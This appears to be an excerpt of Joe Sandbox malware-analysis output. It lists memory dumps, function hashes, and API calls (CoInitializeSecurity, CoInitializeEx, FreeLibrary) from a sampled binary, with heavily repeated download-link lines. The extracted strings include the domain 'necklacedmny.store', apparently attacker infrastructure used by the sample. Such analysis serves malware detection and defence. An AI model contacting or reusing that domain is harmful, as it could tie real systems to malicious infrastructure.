Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a78858df7c52beb43b40d5cce6a43e3e30887499dfea08227770b9e9b3c37ce
Instruction ID: eb624302e3b2efadfe6a3a7e74a3b7c7eeb6207b6226a4071dec5c9da0462608
Opcode Fuzzy Hash: 6a78858df7c52beb43b40d5cce6a43e3e30887499dfea08227770b9e9b3c37ce
Instruction Fuzzy Hash: 39D19E727683014BDB148E2888813AB77E2EF95314F18853CE4855B3D2E375DDA6DB93

Function 0027B7B0 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849f05a76380fddd6e5ecfc4909031dd345936501656c4f93c2776fa87a8f85e
Instruction ID: 95d96bfe9302b26571c351a056981b2d0b029a293fc3bdda06c9d390c38f1edf
Opcode Fuzzy Hash: 849f05a76380fddd6e5ecfc4909031dd345936501656c4f93c2776fa87a8f85e
Instruction Fuzzy Hash: 2DB1297261C3808FD3159A3C889436BBBD2ABD5314F18CB6EE5DA833D6D7B489048717

Function 0026A510 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b478922261415486fd7947f29dfa2806d117124ce81f2793170b3f973c38198c
Instruction ID: eae19de231455fc0d595e50b8df6ba24400d72320339e59b0e3bcb4566eea3e0
Opcode Fuzzy Hash: b478922261415486fd7947f29dfa2806d117124ce81f2793170b3f973c38198c
Instruction Fuzzy Hash: F3414A76319211CFE7149F24EC5676A73E5EBC9304F18883DE581932E0EB74E865CB12

Function 00250CA0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00250CB2

Strings

E89D0AC4E0F46AD26BCB84AD68E6C4B4, xrefs: 00250CC8
necklacedmny.store, xrefs: 00250FA4
Mz, xrefs: 00250E63
tO, xrefs: 00250E55

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID: E89D0AC4E0F46AD26BCB84AD68E6C4B4$Mz$necklacedmny.store$tO
API String ID: 640775948-4213712980
Opcode ID: 5f21cab15d8986f755b5483c3d5bdadbb091c3f08e7ea5d9c658b9d2ec47e10e
Instruction ID: 2989918f8d585b427ff1b07ea03d43b053fa68545a1bdd296b4e96a3d12becb6
Opcode Fuzzy Hash: 5f21cab15d8986f755b5483c3d5bdadbb091c3f08e7ea5d9c658b9d2ec47e10e
Instruction Fuzzy Hash: 06A121B01147828FE325CF24D890766BBA1FF52305F28899CC4D64BB56D735E89ACB91

Function 00270DAD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00270EB3

Strings

#v, xrefs: 00270EB3

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: 629f2128e753cd3f897cfc9c4f037ef29d9115cf534c7407c5f4be186287e57b
Instruction ID: 035f1b271962898b32e3856b82158ecf667d760941ebf04c23854aa34ba5d0a3
Opcode Fuzzy Hash: 629f2128e753cd3f897cfc9c4f037ef29d9115cf534c7407c5f4be186287e57b
Instruction Fuzzy Hash: DA312831111782CFC715CF39C580762BBE3BF9A300F28859DC4DA8B692C735A856CB50

Function 00250B90 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00250C8D

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
